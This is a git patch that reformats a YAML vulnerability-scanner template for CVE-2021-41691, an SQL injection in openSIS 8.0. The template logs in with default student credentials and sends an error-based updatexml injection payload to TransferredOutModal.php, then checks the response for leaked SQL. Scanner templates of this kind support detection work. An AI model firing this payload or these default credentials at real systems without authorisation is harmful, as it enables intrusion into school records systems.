From 21c2c0cd2cf98cd9595611b75c3180729f46c70c Mon Sep 17 00:00:00 2001
From: Sandeep Singh <sandeep@projectdiscovery.io>
Date: Tue, 22 Mar 2022 13:04:29 +0530
Subject: [PATCH] lint update

---
 cves/2021/CVE-2021-41691.yaml | 19 +++++++++++--------
 1 file changed, 11 insertions(+), 8 deletions(-)

diff --git a/cves/2021/CVE-2021-41691.yaml b/cves/2021/CVE-2021-41691.yaml
index bb7373f94d..3441b21e97 100644
--- a/cves/2021/CVE-2021-41691.yaml
+++ b/cves/2021/CVE-2021-41691.yaml
@@ -4,8 +4,7 @@ info:
   name: openSIS Student Information System 8.0 SQl Injection Vulnerability
   author: Bartu Utku SARP
   severity: high
-  description: description
-  reference: 
+  reference:
     - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691
     - https://www.exploit-db.com/exploits/50637
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41691
@@ -18,26 +17,30 @@ requests:
         Host: {{Hostname}}
         Origin: {{BaseURL}}
         Content-Type: application/x-www-form-urlencoded
-        Referer: {{BaseURL}}/index.php?modfunc=logout
-        Connection: close
 
-        USERNAME=student&PASSWORD=student%40123&language=en&log=
+        USERNAME={{username}}&PASSWORD={{password}}&language=en&log=
 
       - |
         POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
         Host: {{Hostname}}
         Origin: {{BaseURL}}
         Content-Type: application/x-www-form-urlencoded
-        Referer: {{BaseURL}}/index.php?modfunc=logout
-        Connection: close
 
         student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
 
+    attack: pitchfork
+    payloads:
+      username:
+        - student
+
+      password:
+        - student@123
+
     req-condition: true
     cookie-reuse: true
     matchers:
       - type: dsl
         dsl:
           - 'contains(body_2, "<!-- SQL STATEMENT:") && contains(body_2, "SELECT COUNT(STUDENT_ID)")'
-          - status_code_2 == 200
+          - 'status_code_2 == 200'
         condition: and